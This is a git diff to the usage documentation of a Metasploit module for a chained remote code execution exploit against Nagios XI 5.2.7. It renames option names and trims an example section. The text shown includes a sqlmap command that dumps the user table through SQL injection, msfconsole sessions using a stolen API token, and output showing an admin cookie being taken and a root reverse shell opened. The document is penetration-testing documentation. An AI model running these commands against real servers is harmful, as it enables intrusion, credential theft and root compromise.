diff --git a/documentation/modules/exploit/linux/http/nagios_xi_chained_rce.md b/documentation/modules/exploit/linux/http/nagios_xi_chained_rce.md index 94d89df99b..e243236cd1 100644 --- a/documentation/modules/exploit/linux/http/nagios_xi_chained_rce.md +++ b/documentation/modules/exploit/linux/http/nagios_xi_chained_rce.md @@ -30,15 +30,15 @@ anyway. ## Options - **USERID** + **USER_ID** - If you wish to exploit a particular UserID, that can be specified here. Default is 1, which is most likely the admin account. + If you wish to exploit a particular ```USER_ID```, that can be specified here. Default is 1, which is most likely the admin account. - **APITOKEN** + **API_TOKEN** The SQLi included only works for MySQL, which should work in most cases. However, if you experience a different backend, you can enumerate the user - table via sqlmap: ```sqlmap -u "http:///nagiosxi/includes/components/nagiosim/nagiosim.php?mode=resolve&host=a&service=" -p service -T xi_users --dump```. - Then you can set the UserID and APITOKEN to skip those phases and move on to exploitation. Default is empty. See example below for more usage. + table via sqlmap: ```sqlmap -u "http://[ip]/nagiosxi/includes/components/nagiosim/nagiosim.php?mode=resolve&host=a&service=" -p service -T xi_users --dump```. + Then you can set the ```USER_ID``` and ```API_TOKEN``` to skip those phases and move on to exploitation. Default is empty. See example below for more usage. ## Usage @@ -95,15 +95,15 @@ msf exploit(nagios_xi_chained_rce) > show options Module options (exploit/linux/http/nagios_xi_chained_rce): - Name Current Setting Required Description - ---- --------------- -------- ----------- - APITOKEN no If an API Token was already stolen, skip the sqli - Proxies no A proxy chain of format type:host:port[,type:host:port][...] - RHOST 192.168.2.218 yes The target address - RPORT 80 yes The target port - SSL false no Negotiate SSL/TLS for outgoing connections - USERID 1 yes User ID in the database to target - VHOST no HTTP server virtual host + Name Current Setting Required Description + ---- --------------- -------- ----------- + API_TOKEN no If an API token was already stolen, skip the SQLi + Proxies no A proxy chain of format type:host:port[,type:host:port][...] + RHOST 192.168.2.218 yes The target address + RPORT 80 yes The target port + SSL false no Negotiate SSL/TLS for outgoing connections + USER_ID 1 yes User ID in the database to target + VHOST no HTTP server virtual host Payload options (cmd/unix/reverse_bash): @@ -146,22 +146,22 @@ Table: xi_users | 2 | admin2 | admin2@admin2.com | 1 | admin2 | c84258e9c39059a89ab77d846ddab909 | 8ftgcj2jubs8nrjnlga0ssakeen4ij8p339cl8shgom7kau7n86j3d6grsidgp6g | +---------+----------------------+-------------------+---------+-------------+----------------------------------+------------------------------------------------------------------+ -...sip... +...snip... ``` #### Re-target -Now, we can set the UserID and APIToken (backend_ticket) +Now, we can set the ```USER_ID``` and ```API_TOKEN``` (backend_ticket) -```msf exploit(nagios_xi_chained_rce) > set userid 2 -userid => 2 -msf exploit(nagios_xi_chained_rce) > set apitoken 8ftgcj2jubs8nrjnlga0ssakeen4ij8p339cl8shgom7kau7n86j3d6grsidgp6g -apitoken => 8ftgcj2jubs8nrjnlga0ssakeen4ij8p339cl8shgom7kau7n86j3d6grsidgp6g +``` +msf exploit(nagios_xi_chained_rce) > set USER_ID 2 +USER_ID => 2 +msf exploit(nagios_xi_chained_rce) > set API_TOKEN 8ftgcj2jubs8nrjnlga0ssakeen4ij8p339cl8shgom7kau7n86j3d6grsidgp6g +API_TOKEN => 8ftgcj2jubs8nrjnlga0ssakeen4ij8p339cl8shgom7kau7n86j3d6grsidgp6g msf exploit(nagios_xi_chained_rce) > exploit [*] Started reverse TCP handler on 192.168.2.117:4444 [*] Nagios XI version: 5.2.7 [*] Getting admin cookie -[+] 2-tGRcLXmX-e1b4545976adf651e80a15c92200624d [+] Admin cookie: nagiosxi=rjs4f9k4299v78hpgq3374q6j6; [+] CSRF token: c53d1f591264a3ea771639a7782627f8 [*] Getting monitored host @@ -185,32 +185,3 @@ QajRDDToeigHGMFdUbaClxkLfJbxqBKv whoami root ``` - -#### No APIToken -Or if the backend is MySQL but we want to target a different user, we can simply just set the userid with no APIToken. - -``` -msf exploit(nagios_xi_chained_rce) > set apitoken '' -apitoken => -msf exploit(nagios_xi_chained_rce) > exploit - -[*] Started reverse TCP handler on 192.168.2.117:4444 -[*] Nagios XI version: 5.2.7 -[*] Getting API token -[+] API token: 8ftgcj2jubs8nrjnlga0ssakeen4ij8p339cl8shgom7kau7n86j3d6grsidgp6g -[*] Getting admin cookie -[+] 2-zIajIKUA-e1b4545976adf651e80a15c92200624d -[+] Admin cookie: nagiosxi=kjeqq7f074pgn61q8l27togtr3; -[+] CSRF token: 05ab9c5c27d99e7c13821a3b43d0f5a6 -[*] Getting monitored host -[+] Monitored host: localhost -[*] Downloading component -[*] Uploading root shell -[*] Popping shell! -[*] Command shell session 3 opened (192.168.2.117:4444 -> 192.168.2.218:51054) at 2016-10-10 10:17:12 -0400 -[*] Cleaning up... -[*] rm -rf ../profile -[*] unzip -qd .. ../../../../tmp/component-profile.zip -[*] chown -R nagios:nagios ../profile -[*] rm -f ../../../../tmp/component-xrnIbKdJ.zip -```